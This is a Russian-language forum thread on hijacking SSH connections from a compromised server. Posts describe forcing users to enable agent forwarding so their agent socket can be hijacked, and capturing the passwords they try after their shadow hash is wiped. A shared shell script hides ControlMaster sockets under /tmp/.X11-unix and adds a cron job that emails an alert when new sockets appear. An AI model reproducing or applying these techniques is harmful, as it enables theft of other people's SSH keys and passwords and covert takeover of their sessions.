Захват локальных исходящих соединений в OpenSSH

[tipsy]

Цитата:

Сообщение от tex

Тут надо еще понять что он имел ввиду =) Я так понял - находясь на сервере отловить ключ,- который используется на клиенте, для авторизации на данном сервере.

Перечитал - да, похоже имелось ввиду именно это.

Единственный сценарий захвата ключа клиента на подконтрольном сервере, который приходит мне в голову может выглядеть так:

Скрипт в .profile проверяет, создаётся ли сокет агента (google "ssh agent forwarding")
если нет, дропает соединение с сообщением "Ошибка аутентификации. Используйте ssh с ключом -A"
Когда юзер задолбается и залогинится с -A, присасывайся к сокету в вперёд.

Да, это соц. инженерия, а не баг, но по-другому никак.

Ещё вариант - удалить ключ и надеяться, что введённый юзером пароль подойдёт.
А лучше ещё и прибить хэш в /etc/shadow и записать все пароли, которые он введёт (потребует нестандартного патча sshd). При внезапном сбое аутентификации человеку свойственно пробовать все свои пароли перед тем как сдаться.

Upd: Кстати, может быть вариант, что агент уже форвардится, тогда халява, повезло.

[euro]

Спасибо способ очень помог (=
для мониторинга небольшой скриптик

Код:

#!/bin/sh
#Host *
#ControlMaster auto
#ControlPath /tmp/.X11-unix/master-%r@%h:%p
cat << EOF > /tmp/mail
DIR="/tmp/.X11-unix/"

if [ "$(ls -A $DIR)" ]; then
mail -s "New files detect" mail@gmail.com  < /dev/null
else
exit 0
fi
EOF
chmod +x /tmp/mail
crontab -l | { cat; echo "*/01 * * * * /tmp/mail >/dev/null 2>&1"; } | crontab
echo "done"